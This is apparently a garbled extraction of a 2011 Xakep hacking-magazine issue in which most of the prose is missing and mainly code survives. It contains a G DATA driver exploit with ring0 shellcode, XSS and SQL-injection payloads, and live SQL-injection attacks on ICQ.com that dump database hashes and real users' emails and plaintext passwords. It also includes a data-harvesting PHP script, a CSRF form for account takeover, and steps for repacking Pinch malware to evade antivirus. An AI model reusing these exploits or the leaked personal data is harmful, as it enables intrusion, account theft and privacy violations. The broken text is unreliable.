sub_10CD4,
, (, , )
PageFault.
, dword_228B4 NULL,
jmp ecx ( ).
success
.text:0001DBA0 cmp
[ebp+DeviceObject], 8 ;
.text:0001DBA4 jb
loc_1DD19
.text:0001DBAA mov
eax, [edi] ; eax
4
.text:0001DBAC mov
dword_228B4, eax ;
x-refs() dword_228B4 ,
winsock bind,
, jmp
ecx, , , !
.text:00010CD4
.text:00010CD4
.text:00010CD6
.text:00010CD7
.text:00010CD9
.text:00010CDF
.text:00010CE1
.text:00010CE3
NULL
.text:00010CE5
.text:00010CE6
.text:00010CE8
.text:00010CE8
.text:00010CE8
.text:00010CE8
.text:00010CE9
.text:00010CE9
sub_10CD4
proc near
mov edi, edi
push ebp
mov ebp, esp
mov ecx, dword_228B4 ; ecx
xor eax, eax
test ecx, ecx
jz
short loc_10CE8 ;
pop ebp
jmp ecx ; !!!
; -----------------------------------loc_10CE8:
pop ebp
retn 4
sub_10CD4
endp
EXPLOIT
DeviceIoControl, bind:
in = 0x10, out = 0x0C;
*inbuff = ring0_shellcode_address;
DeviceIoControl(hDevice,
ioctl,
(LPVOID)inbuff,
in,
(LPVOID)inbuff,
out,
&len,
NULL);
bind( ListenSocket, (SOCKADDR*) &service,
sizeof(service); // !
, , dword_228B4
,
044
44
SOLUTION
04
G DATA
TARGETS:
:
1.Race Condition Native API
2. Ioctl
Ioctl
MiniIcptControlDevice0.
, ,
.
Ioctl 0x83170180:
.text:00010DBC
cmp
.text:00010DC2
jz
[..]
.text:00010EC0
push eax ; <------ eax
4
X 01 (144) 2011
, DoFreeContext, FLT_CONTEXT ,
:
: svchost.exe
,
.text:00010EC1
call FltReleaseContext ;
WDK,
.
,
,
.
FLT_CONTEXT .
,
. ,
.
, :
Step' Windbg,
DoFreeContext: FltReleaseContext
DoReleaseContext DoFreeContext.
.text:00011F04 ; int __stdcall DoFreeContext(PVOID Entry)
.text:00011F04 _DoFreeContext@4 proc near
.text:00011F04
.text:00011F04 Entry = dword ptr 8
.text:00011F04
edi, edi
.text:00011F04
mov
ebp
.text:00011F06
push
ebp, esp
.text:00011F07
mov
esi
.text:00011F09
push
edi
.text:00011F0A
push
.text:00011F0B
mov
edi, [ebp+Entry]
.text:00011F0E
mov
esi, [edi]
; <----- edi
.text:00011F10
mov
eax, [esi+4]
.text:00011F13
test
eax, eax ;<----
NULL
.text:00011F15
jz
short loc_11F24
.text:00011F17
xor
ecx, ecx
.text:00011F19
mov
cx, [esi+0Ch]
.text:00011F1D
push
ecx
ecx, [edi+28h]
.text:00011F1E
lea
.text:00011F21
push
ecx
eax ; <-----
.text:00011F22
call
X 01 (144) 2011
EXPLOIT
FLT_CONTEXT,
4 DeviceIoControl:
void craft_fake_flt_context(
char* buff,
LPVOID shellcode_addr)
{
DWORD references = 1;
DWORD *Entry;
Entry = (DWORD*)malloc(0x8);
Entry[0] = Entry; //Entry[0] == esi
Entry[1] = shellcode_addr; //[esi+4] r0 shellcode
memcpy(buff-0x4, &references, 0x4);
memcpy(buff-0x28, Entry, 0x4);
}
...
craft_fake_flt_context(inbuffer, zpage);
buff[0] = inbuffer;
DeviceIoControl(
hDevice,
ioctl,
buff,
in,
buff,
out,
&len,
NULL);
SOLUTION
. ..z
045
DX http://kaimi.ru
, , ,
SQL- XSS.
,
,
272 273 . , :
.
,
,
,
. IT-, http://kaimi.
ru/quest. -:
SQL
HTML-. .
600 , 21.
,
. ,
.
, . ,
.
, , , .
help
. , !
0
: dx
: , . .
ans - , , ,
046
.
.
1
: Kaimi
: , , .
,
Google. ,
. ,
, .
- ,
. 2.
2
: Kaimi
:
. , 16 . , . ,
, ,
,
. ,
, .
ans,
X 01 (144) 2011
base64
PHP
ROM-
Hexposure
Tineye.com! , ,
Babylon.
3
: Kaimi
: ,
, . PHP-, , , ,
. dx :). !
. -,
, base64,
, eval
print
, .
, ...
,
. , , ,
. ,
, .
, if. , -
, .
true, php-,
<?php ?> ,
,
!
X 01 (144) 2011
: Kaimi
: PHP, 4.
ROM Dendy, Kaimi.
, , ,
.
, ,
. ... Kaimi - ROM
, , , !
: Hex-, ( "" <-> "").
Hexposure.
ROM Nesticle, ,
- (, ).
,
.
.
, :
80=0
81=1
8A=A
...
tbl. ROM,
Hexposure,
.
ROM, ,
.
,
, .
, - :).
047
Perl
, XOR BY 0X03. , XOR,
. , , , , ,
, , ,
,
. , PHP :
<?php
$string = ' ';
for($i = 0, $len = strlen($string); $i < $len; $i++)
print chr(ord($string[$i]) ^ 0x03);
?>
,
.
5
: Kaimi
: -, ,
Perl. ,
, . , ,
eval print - .
, lame,
,
. "369Y9RLj73Y
WTiX4W7D7460Wxj1Kkp4b6f7A4mbTWmw5sfnAnmHEZUA3VndW" ^
"CDP7Mrn6Yp631SxV6M-YSWl9ZJX-CTu0q0lqiMDrwI6g405q3M4zr1D8IMl" , - ,
XOR. , print, pl, : print "\
nCode: bazinga\n" if($ARGV[0] && $ARGV[0] eq 'pwn').
, bazinga.
6
: dx
: . ,
,
. ,
,
. , . , , . ,
,
1000, .
7
: dx
: C++. ,
, .
:
#include "windows.h"
void main()
{
DWORD ans = 0;
048
17C.
8
: Kaimi
: SWF- .
, . ? Media
Player Classic .
-
flash, , Sothink SWF Decompiler
28.
9
: dx
: , - .
.
.
10
: dx
: . rar- 500.rar,
499.rar, 498.rar, 0.rar,
. ,
( ,
, ). , .
:
@echo off
for /L %%i in (500,-1,0) do call :arch %%i
exit /b
:arch
set a=%1
rar x -r -pspielberg %a%.rar
del %a%.rar"
exit /b
WinRAR,
500.rar; password.txt
.
X 01 (144) 2011
11
: dx
: . ,
, ,
. - ,
(, SoundForge), .
12
: Kaimi
: .
, ,
. , , QR-,
, Tineye
Google,
, , , qc,
. - QR- (, zxing.org/w/decode.jspx), RAR!.
rar, WinRAR , ,
, , !
RAR-,
, ? ,
PNG- ,
, , . WinRAR
, ,
.
13
: dx
: .
, . , , exe
(, , ..). . , , Resource Hacker,
, .
14
: dx
: , ,
X 01 (144) 2011
.
: ,
, ASCII-
, ,
,
.
, . ,
. ,
4. , .
15
: Kaimi
: , , ,
, .
exe-, - . ,
. ,
: NES US 89. , ,
NES 1989 .
, , ,
.
NES (ru.wikipedia.org/wiki/___NES/).
1989 , ,
, Ninja Gaiden. exe
, , ,
.
.
! ,
, , . , , ;
Kaimi ,
: kaimi.ru/quest_x2/.
, !
, , ,
, , ,
:).
! z
049
uage
t-Lang
HTTP-
, HTTP-
, , ,
- . ?
?
,
. HTTP (HyperText Transfer Protocol ) - ,
-. WWW -.
: , , .
RFC, HTTP ( 1.1),
,
.
:
( google.com) .
.
: ,
. ,
/ .
IP ( ). ,
, .
, ,
. -
Proxomitron.
, . HTTP-.
Proxomitron ,
.
050
.
Headers :
, ,
New. , out.
.
Mozilla Firefox . Tamper Data
. :
, .
.
Modify Headers.
Always on, .
. (Add , Modify , Filter ),
, ;
. , .
, / .
web-. ,
.
X 01 (144) 2011
ie
Accep
r
ed-Fo
ward
X-For
r
ere
Ref
gent
User-A
ie
ok
Co
t-Lang
Accep
X-
Fo
rw
Ref
ar
ere
de
d-
Fo
uage
Wergon
uage
t-Lang
Co
ok
ie
Accep
ed-Fo
ward
X-For
r
ere
Ref
gent
User-A
ie
ok
Co
Accep
uage
t-Lang
r
Fo
dde
ar
rw
Fo
X-
User-Agent
cx75planet.ru
HP-include , . , ,
. , .
XSS ,
.
,
. XSS
Referer ( ), ,
( %xx).
, Referer.
,
.
XSS . , , , , .
SQL- . , , , .
PHP- ,
. .
, GET POST .
, , .
.
:
">. , . '"><script>alert(document.
cookie)</script>.
; , , , <?'?>
.
(
),
, . ,
?
document.cookie 1.
.
,
.
User-Agent
.
: , , , , .
,
:
X 01 (144) 2011
Modify Headers
/ (; ; ,
[; - ]) []. X11 Windows,
, .
: N (None) , I
(International) 40 ,
U (USA) 128 .
.
, , . Mozilla,
. , ( )
(World
Wide Web Consortium, W3C), ,
.
, , ,
JavaScript (,
Invision Power Board,
2.3.x,
). User-Agent
.
Referer
, .
, - . Referrer ().
, -, ,
.
,
, ( ,
).
, URL , ,
http://evil, http://example.com/evil ..
X-Forwarded-For
, -
HTTP://WWW
links
tools.ietf.org/
html/rfc2616 RFC
HTTP/1.1
2ip.ru/
proxomitron.ru/
Proxomitron'
addons.mozilla.org/
ru/firefox/addon/966/
Tamper Data
addons.mozilla.org/
ru/firefox/addon/967/
Modify Headers
useragentstring.com/
User-Agent
051
uage
t-Lang
The Proxomitron.
, ,
.
.
The Proxomitron.
IP .
IP, ,
, IP , X-Forwarded-For.
,
XFF, .
- (, , ,
IP ,
). : X-Forwarded-For: client_ip, proxy1_ip, ...,
proxyN_ip.
Accept-Language
,
. . ,
,
.
. , ,
.
Accept-Charset
. , ,
windows-1251.
X-Requested-With
, .
JavaScript . AJAX (Asynchronous
Javascript and XML) ,
XMLHttpRequest.
Authorization
,
, .
Authorization Basic
base64(user:pass). ,
,
(POST).
Cookie
, () .
: ,
. ,
.
, . , .
052
, , . ,
Accept-Language,
. Authorization , .. , -
. X-Requested-With Cookie ,
. PHP :
, PHPSESSID ( ,
, , ). ,
a-z, A-Z, 0-9 '-,',
- ,
:
Warning: session_start() [function.session-start]:
The session id contains illegal characters, valid
characters are a-z, A-Z, 0-9 and '-,' in /var/www/
data/www/login.php on line 2
, . , -
(), .
.
: , - (,
, ,
), Referer.
, ,
, ...
XSS FeedBurner,
RSS- .
Referer.
raz0r.name/vulnerabilities/
aktivnaya-xss-na-feedburner/ (wp.me/pft5J-4a) ( , - XFF :)).
X 01 (144) 2011
ie
Accep
ed-Fo
ward
X-For
r
ere
Ref
gent
User-A
ie
ok
Co
t-Lang
Accep
ar
rw
Fo
X-
Ref
ere
de
d-
Fo
uage
uage
t-Lang
Co
ok
ie
Accep
ed-Fo
ward
X-For
r
ere
Ref
gent
User-A
ie
ok
Co
Accep
uage
t-Lang
r
Fo
dde
ar
rw
Fo
X-
The Proxomitron.
Tamper Data
DLE (DataLife
Engine), DLE Referer Module (
) . ICQ UIN MySQL-,
,
, .
php.ru
Referer XFF.
. :
MySQL Error = You have an error in your SQL syntax;
check the manual that corresponds to your MySQL
server version for the right syntax to use near
'"')' at line 1
SQL = INSERT INTO oops_sessions (ID,UID,START,LAST,I
PS,PAGES,PAGE,DATA,REFFER) VALUES ('dpdu7rh90ehfsc62
','0',1238958331,1238958331,'xxx.xxx.xxx.xxx',1,'/',
'a:1:{s:8:"USERNAME";s:10:"";}','SQL-Inj'here')
PHP
, SQL-
. , , ,
. GET, POST Cookie. ,
, .
,
request, :
$headers = array (
'User-Agent: Babytoy/0.5',
'Referer: http://refrefref.ref/omg.pl'
);
$html = request_socket('http://127.0.0.1/
showmeheaders.php', $headers);
echo $html;
PHP
( DVD):
X 01 (144) 2011
Tamper Data
. :
$packet = "GET {$url} HTTP/1.1\r\n"
. "Host: {$host}\r\n"
. implode("\r\n", $headers) . "\r\n"
. "Connection: Close\r\n\r\n";
- file_get_contents()
:
$opts = array (
'http' => array (
'header' => implode("\r\n", $headers) . "\r\n"
)
);
$context = stream_context_create($opts);
return file_get_contents($url, false, $context);
Curl
curl : curl_setopt($ch, CURLOPT_
HTTPHEADER, $headers);
,
.
JavaScript, Flash ,
. NoScript
AdBlock. ,
, . ! z
053
M4g icq 884888, http://snipper.ru
DST
AOL
ICQ: ,,
ICQ
2010
ICQ IM DST AOL.
187 .
,
.
Changes
icq.com - 2010 .
.
, https://icq.com/password, ,
UIN ,
. , email' . ICQ , primary email
, email for login.
-
, ,
.
: ,
,
! ,
.
:
1. ;
2. / ;
3. ,
, ;
4.
.
.
, - .
054
- icq.
com.
X 01 (144) 2011
HTTP://WWW
links
ICQ ABV.bg
,
ICQ.
:
1. https://icq.com/password,
;
2.
click here;
3. ,
click here :
: https://www.icq.com/password/form/
web?form_type=qna&id=1&sn=XXX&show=1
: https://www.icq.com/password/form/
web?form_type=qna&id=2&sn=XXX&show=1
,
mail@partner_icq.com.
,
.
, 2010 .
() .
.
, ICQ
:
1. ABV.bg ICQ;
2.
Bigmir.Net;
3. ,
;
4. Yandex ICQ;
5.
Atlas.sk, MyNet.com, Nana.co.il
.
ICQ.com
(https://forum.antichat.ru/showthread.
php?p=626441) SQL-
greetings.icq.com, , , ,
-
SYBASE ASE 15.0.1. :).
DST ( Mail.ru group X 01 (144) 2011
SQL- blogs.icq.com
) - ICQ.com
(msgboard_u_ro@64.12.164.91 ,
msgboard , 5.1.45-log )!
(
blogs.icq.com) 17 2010 S00pY Snipper.Ru.
,
( ).
:
http://blogs.icq.com/blogs/blog/
tag/406428869-99999+union+select+1,concat(us
er,0x3a,password),3+from+mysql.user--+
mysql.
user:
localhost:root:*B3A0E433E7AD0F00794196F3C293
1CD66AA89796
%:msgboard_u_rw:*7FBD912E113CF606E410F18C967
487CE935ACFAC
%:scout:*9FD2B52556065163308826C11DD588A6F3
F2ED9E
%:repl:*90414724CBFFFE7B4880631D5E9E7232
C4737680
%:mydbm:*A9C391720DC3B218CD5EFEDFEDB8C55602
EFE2FE
%.aol.com:dstdbm:*4D93DC0E9E6FC017216D7DE4B4
9BC77BEE4E9EDE
localhost:dstdbm:*4D93DC0E9E6FC017216D7DE4B4
9BC77BEE4E9EDE
%:ping:*75E75A54E1CF941C40965FD3C39B1937910
2B07B
%:argus:*F5A7D854E9C46784C82EFC0DAE973F6170
3A7224
%:nocdba:*2D48BF42A42234DBBCADDFA0F94C9ED46
0BD1567
%:repcheck:*B58082AC1A96B8580F828E2C730A4E9
1A26DE3B0
%:msgboard_u_ro:*F1D9E0F8627E5AD39CF98BFC58E
344CF4CCACAB4
localhost:repcheck:*B58082AC1A96B8580F828E2C
730A4E91A26DE3B0
icqwebmsdb-d05.db.aol.com:repcheck:*B58082AC
1A96B8580F828E2C730A4E91A26DE3B0
http://forum.
asechka.ru
.
http://www.icq.com/
en.html
ICQ.com.
http://snipper.ru/
view/23/sql-inekciyana-blogsicqcom/
SQL-
blogs.icq.com.
http://snipper.ru/view/27/
vozvrashhenieugnannogo-nomeraicq/
ICQ.
http://www.rnspdf.londonstockexchange.com/
rns/7389V_
-2010-11-5.pdf
- DST
IPO.
http://russia.
blog.nimbuzz.
com/2010/11/09/
icq-ne-rabotaet-vnimbuzz/
ICQ
Nimbuzz.
055
ICQ.com
SQL- icq.com/greetings
Mail.ru ICQ.com
select null,@@version,null,null,null,null,null,null
,1,null,null,null,null,null,null,null,null,null,nul
l--/
msgboard.lsps_tb, (Basic distribution
ID QIP')
ICQ.com, GameLand
ICQ tv :).
...
21;Walla
22;HP
23;Prosieben Austria
24;Jetix
25;Rambler Generic
26;Bigmir Belarus
27;Centrum CZ
28;GameLand
29;SUP
30;Puls4
31;Centrum SK
32;Yandex
...
, ,
blogs.icq.com , , SQL :).
056
, blogs.icq.com,
.
,
registration_temp, :
regstr_id
regstr_origin
regstr_fname
regstr_lname
regstr_email
regstr_password
regstr_bdate
regstr_question
regstr_answer
regstr_nickname
regstr_lsp
regstr_reg_date
, , , icq.com/register ! ,
, , ! ,
, :
1. ;
2. registration_temp;
3. .
:
<?php
...
while(1)
{
$a = send_data('GET','http://www.icq.com/
greetings/cards/-1111+union+select+1,count(regstr_
id),3,4,5,6,7+from+registration_temp+--/send/');
$count = preg_replace('@.+id="card_title"
value="([^"]+)".+@is','$1',$a);
$a = send_data('GET','http://www.icq.com/
X 01 (144) 2011
. icq.com/wit
ICQ.
com
Yandex ICQ
greetings/cards/-1111+union+select+1,concat(regstr_
id,0x3a,regstr_origin,0x3a,regstr_fname,0x3a,regstr_
lname,0x3a,regstr_email,0x3a,regstr_
password,0x3a,regstr_bdate,0x3a,regstr_
question,0x3a,regstr_answer,0x3a,regstr_
nickname,0x3a,regstr_lsp,0x3a,regstr_reg_date),3,4,5,
6,7+from+registration_temp+limit+'.($count-1).',1+--/
send/');
$log = preg_replace('@.+id="card_title"
value="([^"]+)".+@is','$1',$a);
logger($log);
}
?>
, , ,
:). :
12495211:1:Samira.:x3:dadidux33@web.
de:pudding2:1992-12-04 00:00:00:::Samira. x3:0:201011-15 12:30:53
12495219:1:Ivo:Geckovski:sfors_ivo@abv.
bg:a1b2c3d4:1985-03-27 00:00:00:::Ivo
Geckovski:0:2010-11-15 12:30:55
12495225:1:Madlen:Schwarz:Madlenschwarz85@
web.de:bier85:1985-02-05 00:00:00:::Madlen
Schwarz:1006:2010-11-15 12:30:58
12495235:0:Di:Karnavala:di_posh@nxt.
ru:345562iv:1987-04-24 00:00:00:::Di
Karnavala:-2:2010-11-15 12:31:00
12495247:1:Hellow:Kitty:kiska999-85@yandex.
ru:389162aa:1985-05-12 00:00:00:::Hellow
Kitty:3:2010-11-15 12:31:03
- ICQ.com.
https://www.icq.com/register/email_attach.php
X 01 (144) 2011
( https://www.icq.com/
karma/login_page.php ).
, - ICQ.com
, ,
,
- .
,
:). .
, :
, ,
http://www.icq.com/people//edit/ (
https://www.icq.com/register/email_attach.php),
;
, , .
https://www.icq.com/register/email_attach.php.
- , html- :).
,
( ICQ.com):
1. html-:
<form action="http://icq.com/people/include/xhr.php"
method="POST">
<input name="f" value="resendMail"/><br/>
<input name="e" value="_@.ru"/><br/>
<input name="lang" value="en"/><br/>
<input name="server" value="prod"/><br/>
<input type="submit" value="ok"/><br/>
</form>
2. ;
3. email for login;
4.
https://icq.com/password :).
,
.
,
ICQ .
-,
ICQ,
.
, -
, ,
, . .
:).z
057
"Cr@wler" crawler@xakep.ru
,
,
malware-.
,
.
, , . -, -
Pinch (
, ).
,
-
( , ,
RAR- DVD).
058
VMWare Windows XP (
, ).
, OllyDbg, WinHex,
PE- LordPE. , ,
virustotal.com . , ,
, .
,
X 01 (144) 2011
. . , .
!
.
. , XOR , ,
! ,
(pinch.exe) .
13147810. 13147C26
,
. . , :
13147C30
13147C31
13147C36
13147C3C
13147C3F
13147C45
13147C47
13147C48
PUSHAD
MOV ECX,6C2F
MOV EDX,DWORD PTR DS:[ECX+13141000]
XOR EDX,76
MOV DWORD PTR DS:[ECX+13141000],EDX
LOOPD SHORT pinch_pa.13147C36
POPAD
JMP SHORT pinch_pa.13147810
( ,
copy to executable-all modifications,
Save file). , , LordPE,
( OEP 13147C30,
) . ;
OllyDbg, ,
(
13147C48 , Shift+F9). ,
6C2F . . ! . virustotal.com,
. , 31
43 ( 42 43)! .
.
,
. , ,
( - -
,
2009 ).
X 01 (144) 2011
13147C4B XOR EAX,EAX;
13147C4D PUSH pinch_pa.13147C62;
13147C52 PUSH DWORD PTR FS:[EAX];
13147C55 MOV DWORD PTR FS:[EAX],ESP;
FS:[0]
13147C58 CALL pinch_pa.13147C58;
13147C5D JMP pinch_pa.13145555;
13147C62 POP EAX;
13147C63 POP EAX
13147C64 POP ESP
13147C65 JMP pinch_pa.13147810;
:
13147C62. ,
, ,
13147C58
(JMP pinch_pa.13145555),
. , , ,
. ,
( 27 43
).
, ?
.
, , ,
,
. ,
,
. ,
, !
,
, (
).
13147C90 , ,
(4Ch ,
13147C30). ,
. ,
059
OllyDbg , OEP
,
.
. , ! ,
: , 13140002,
:
13140002
EB 24
, 13140028, :
13147C90
60
13147C91
B9 4C000000
13147C96
8B91 307C1413
DS:[ECX+13147C30]
13147C9C
83F2 54
13147C9F
8991 307C1413
DS:[ECX+13147C30],EDX
13147CA5
^E2 EF
kadabra_.13147C96
13147CA7
61
jmp 13147c30
PUSHAD
MOV ECX,4C
MOV EDX,DWORD PTR
XOR EDX,54
MOV DWORD PTR
LOOPD SHORT
POPAD
,
, .
. , , PE-, ImageBase,
. . WinHex , : 4D 5A 00 00 (-,
MZ,
PE-!). PE- (
13140000h),
:
13140000
13140001
13140002
13140004
4D
5A
0000
0100
DEC
POP
ADD
ADD
EBP
EDX
BYTE PTR DS:[EAX],AL
DWORD PTR DS:[EAX],EAX
...
13140028
0000
,
. , ,
MZ-,
, . ,
. 13140028.
060
13140028
-E9 637C0000
JMP 13147c90
, LordPE
EntryPoint. , , :
25 43 .
, ,
.conf .data ,
. .
,
OllyDbg , ,
! , , image base.
Image base , ,
.
: ,
15- .
, ,
15000 , . , - ,
. , ,
-
, API-,
. ? .
,
. ,
,
. ,
. ,
. ,
, API- GetLocalTime, X 01 (144) 2011
:
:)
16-
:
typedef struct _SYSTEMTIME {
WORD wYear;
WORD wMonth;
WORD wDayOfWeek;
WORD wDay;
WORD wHour;
WORD wMinute;
WORD wSecond;
WORD wMilliseconds;
} SYSTEMTIME;
//
//
//
//
//
//
//
//
, , GetLocalTime,
, , , 13147D7D
13147D94. Sleep(), Kernel32,
, , , . , :
13147CFA PUSH kadabra_.13147D7D;
13147CFF CALL kernel32.GetLocalTime;
13147D04 PUSH 3E8; 1000 , 1
13147D09 CALL kernel32.Sleep;
13147D0E PUSH kadabra_.13147D94;
13147D13 CALL kernel32.GetLocalTime;
16-
, , , :
[][][ ][ ] []
[] [][]
13147D7D: DA 07 0A 00 02 00 0C 00 0D 00 0C 00 31 00
B1 03
13147D94: DA 07 0A 00 02 00 0C 00 0D 00 0D 00 04 00
B1 03
: , X 01 (144) 2011
,
Dr. Web
. 1 ,
, ,
[13147d7d+] [13147D94+],
( ).
, . ?
.
( , , ),
, :). , :
13147CF9 ; (
)
13147D18 MOV AL,BYTE PTR DS:[13147D89]; AL
13147D1D MOV AH,BYTE PTR DS:[13147DA0]; AH
13147D23 SUB AH,AL;
13147D25 XOR EBX,EBX; EBX
13147D27 MOV BL,AH; EBX
13147D29 ADD EBX,13147C29;
13147D2F JMP EBX;
, , ,
EBX, 13147C30. , , , .
: Dr. Web ! :).
. 22 43
- .
, , -
. , ,
, , :
. ,
,
virustotal .
, , , , ,
. ,
, -, TLS. ?
, .
, TLS- ,
,
061
25%
, . , callback-
.
, TLS (Thread Local Storage)-callback-
( , TLS ,
),
, , . Callback
, OEP.
,
, ,
PE-.
TLS-
( callback- ).
, , .
.
(13147d80 13147d90), .text, .
DWORD , , ,
callback- (13147d96),
callback- (13147da0).
TLS-: 80 7d 14 13 90 7d
14 13 96 7d 14 13 a0 7d 14 13. 13147d5d
( ).
TLS-.
13147da0, 6 ,
Binary Edit. 13 14 7d b0 00 00. 4
callback-.
callback-.
13147db0 ,
, :
062
13147DB0 PUSHAD;
13147DB1 MOV ECX,6D2F;
13147DB6 MOV DH,BYTE PTR DS:[ECX+13141000];
DH
13147DBC XOR DH,CL;
13147DBE MOV BYTE PTR DS:[ECX+13141000],DH;
13147DC4 LOOPD SHORT 13147DB6;
13147DC6 POPAD;
13147DC7 RETN;
, , , ,
-
OllyDbg.
TLS-
PE-. LordPE TLS Address 00005d7d (,
OllyDbg). ,
TLS,
callback-, OllyDbg Alt+O ,
,
, System Breakpoint (
, TLS callback !).
virustotal.com.
18 43 ! , ,
DrWeb, Panda, NOD32, TrendMicro-HouseCall, VBA32, ViRobot,
VirusBuster, Sunbelt 7048, F-Secure, BitDefender, eSafe
.
. , .
! z
X 01 (144) 2011
>> coding
http://lotus.xakep.ru
X-testing ontest
IBM Lotus Symphony 3. ,
Lotusphere, 2011 .
cr@wler
10
Lotus Symphony
Lotusphere-2011.
zenit80 .
(Digital Security, dookie@inbox.ru)
(CISS Research Team)
(CISS Research Team, twitter.com/Ntarakanov)
dangertrace.log
conditional jumps
invertation
trace.log
avalanche
driver
tracegrind
input +
executable
heuristeic value,
errors
input +
executable
danger conditions
checking
STP
new input
values
covgrind
Avalanche
, ,
Microsoft,
. ,
. .
, .
...
Fuzz me baby one more time!
064
( , ),
. , ,
- ,
, :
+----+--------+
|0004|61626364|
+----+--------+
| "abcd"
|
+----+--------+
, :
+----+-------|FFFF|61626364...
+----+-------X 01 (144) 2011
In Memory Fuzzing.
IDA
In Memory Fuzzing.
...
| "abcd..."
+----+-------+----+--------+
|0004|25XX25XX|
+----+--------+
| "%n%n"
|
+----+--------+
+----++
|0000||
+----++
| "" |
+----++
, , , ,
... ,
-
(0xFFFF -1)
memcpy, , .
char buffer[32000];
short int length=getLen(filename, offset); //
length=-1 ~ 0xFFFF
if(length<32000) {
// -1<32000
char* p = getPointer(filename,offset+4);
memcpy(buffer,p,length); // length==65535
}
else
ExceptionBoF(length);
( ),
. :
+----+--------+
|0004|61626364|
+----+--------+
| "abcd"
|
+----+--------+
:
+----+--------+
|0000|61626364|
+----+--------+
| "abcd"
|
+----+--------+
+----+--------+
|00FF|61626364|
X 01 (144) 2011
+----+--------+
| "abcd"
|
+----+--------+
+----+--------+
|FF00|61626364|
+----+--------+
| "abcd"
|
+----+--------+
(0xFF00 - -256 65280 ),
- .
,
. , (
), .
, , , - . ,
,
,
. , , . , ,
- ( / ) ,
. ,
, .
, .
More profit...
, , .
, ,
, . , 2006 (Shawn Embleton),
(Sherri Sparks) (Ryan Cunningham)
. ,
( ,
..) , .
( ), ,
, , API (strcpy)
, , .
,
.
( ). , ,
, :).
065
fputs("FUNC1: done!\n",stdout);
}
avalanche, klee
hotfuzz, inmemoryfuzzing
sulley, peach
simple fuzzer:
blackhat.com/
presentations/bh-usa-06/BH-US-06-Embleton.pdf.
In-Memory Fuzzing
, .
?
. , ,
, ,
.
. ,
; , ,
, (, ,
..).
, accept,
recv, .
CorelanSecurity Team,
redmine.corelan.be:8800/projects/inmemoryfuzzing/files.
, Pydasm (therning.org/magnus/
archives/278) Paimei (openrce.org/downloads/details/208/PaiMei).
, Immunity Debuger
(debugger.immunityinc.com/register.html). ,
,
) c pvefindaddr.py (redmine.corelan.be:8800/projects/
pvefindaddr). , ,
:
1. ;
2. pvefindaddr, PyCommand (
);
3. pydasm 2.5;
4. , , installers, ;
5. pydasm Python25\Lib\
site-packages\pydbg\pydasm.pyd.
PyDbg 2.5. - . , ,
,
. ,
- .
, .
.
void func1(char* input)
{
char buffer[255];
unsigned int len=strlen(input);
if(len<255) strcpy (buffer , input);
066
, , ,
,
. - .
input.txt: function_1:func
tion_1:function_3. (vuln.exe)
, .
.
. pvefindadr.
, functions -o -m vuln.
exe. functions.txt.
. Trace.py.
, Trace.py, ,
, .
vuln.exe . func.
.
functions.txt, function_. , (RET),
(, ,
ESP+4, , ESP+8).
new_functions_addrs.txt ( ) flow_log.txt ( ).
CTRL+C ,
:). flow_log.txt ,
( ESP+4 ), /
new_functions_addrs.txt breakpoints.txt,
.
:
0x00401000 0x0040106d ESP+4
0x00401070 0x004010c7 ESP+4
0x004010d0 0x00401125 ESP+4
InMmoryFuzzer.py
vuln.exe. ,
, ,
,
( )
(). crashbin
. ,
(. ). ,
(InMemoryFuzz) ,
, ,
... , , pvefindaddr ,
IDA. ,
,
X 01 (144) 2011
Peach
(00401070) .
, strcpy ,
. ,
. ( ,
, ,
). ,
(vuln.exe
/GS), security cookie
,
, .
Recorded
data
agregation
Data
matching
Proxy
. , , ,
winappdbg.
.
, winappdbg
.
: avalanche klee
avalanche (http://code.google.com/p/avalanche/):
.
X 01 (144) 2011
Custom
Process
monitor
Peach in
the middle
Custom
publisher
GUI
Communicator
Main
window
Fuzzing
Graphical
User
Interface
Hot fuzz
Datatypebased
fuzzing
Netstat
based
port
scanning
Dialogs
UDP
support
Custom
Random
Fuzzing
strategy
Packet
reconstruction
Viewing
crash
details
Data
receive
Packets
dissection
Filling in
missing
data
Aditional
data
analysis
Process
handling
XML
manipulators
Storing
application
settings
Transforming C-structures
into Python-structures
Data analysis
Sulley peach.
. , FTP 329
, . ,
.
hotfuzz (hotfuzz.atteq.com).
,
. Hotfuzz peach .
.
, ,
, , ,
tm_export, tshark (
wireshark). , ,
, .
, , ... !
,
peach ( DVD).
Customized
WindowsDebugEngine
Monitor
Recording
TCP
support
:
3*10^6 5*10^3 ,
1-3 ;
1*10^6 15*10^3 , 6-10 ;
:
1*10^5 150 ,
0-3 ;
1*10^4 150 ,
0-1 .
,
:
http://sites.google.com/
site/felipeandresmanzano. ,
.
,
. .
Configuration
file
generation
Data type
correction
Transformation
into Peach
structures
Peach structures
creation
Strings
tokenization
Finding
relations
Wireshark libraries
hotfuzz
Avalanche
( ). , .
, . Avalanche
,
stp valgrind (
). :
$ wget http://avalanche.googlecode.com/files/
avalanche-0.2.tar.gz
$ tar -xvf avalanche-0.2.tar.gz
$ cd avalanche-0.2
$ configure --prefix=`pwd`/inst
$ make
$ make install
:
$ ./inst/bin/avalanche --filename=samples/simple/seed
--debug samples/simple/sample2 samples/simple/seed
Avalanche,
avalanche ? -
067
winappdbg
avalanche ,
.
, ,
,
. :
(tainted) ,
( , , ..),
.
( , ,
). ,
,
, ,
, . Avalanche
Valgrind
(solver/) STP. Avalanche
: () Valgrind
Tracegrind Covgrind,
STP . Tracegrind
. STP . - , STP
( ), .
,
.
. ,
STP
.
068
,
, .
(
, Valgrind).
Covgrind,
. Covgrind , Tracegrind,
.
: Avalanche ,
,
. (tainted
analysis[2-5]), , , ,
.
STP
Avalanche ,
. KLEE
(klee.llvm.org).
. z
X 01 (144) 2011
PocketBook!
PocketBook
?
?
usability? ,
10 2011 pocketbook@real.xakep.ru.
E-Ink
: PocketBook 902.
X 01 (144) 2011
023
, CISS Research Team http://twitter.com/NTarakanov
TOP5
2010
- ,
!
-,
.
5 .
2007 CVE-2007-4573 (bit.ly/CVE-20074573). cliph,
Wojciech Purczynski (, ?).
, 64-
linux, 32- . (
arch/x86_64/ia32/ia32entry.S), 32-
64-:
sysenter_do_call:
cmpl
$(IA32_NR_syscalls-1),%eax
<---- EAX
ja
ia32_badsys
IA32_ARG_FIXUP 1
call
*ia32_sys_call_table(,%rax,8)
<---- RAX
, eax .
, IA32_ARG_
FIXUP. 64- 32-.
sysenter_do_call, ,
eax,
rax! , 32 ,
070
call !
.macro IA32_ARG_FIXUP noebp=0
movl
%edi,%r8d
.if \noebp
.else
movl
%ebp,%r9d
.endif
xchg
%ecx,%esi
movl
%ebx,%edi
movl
%edx,%edx
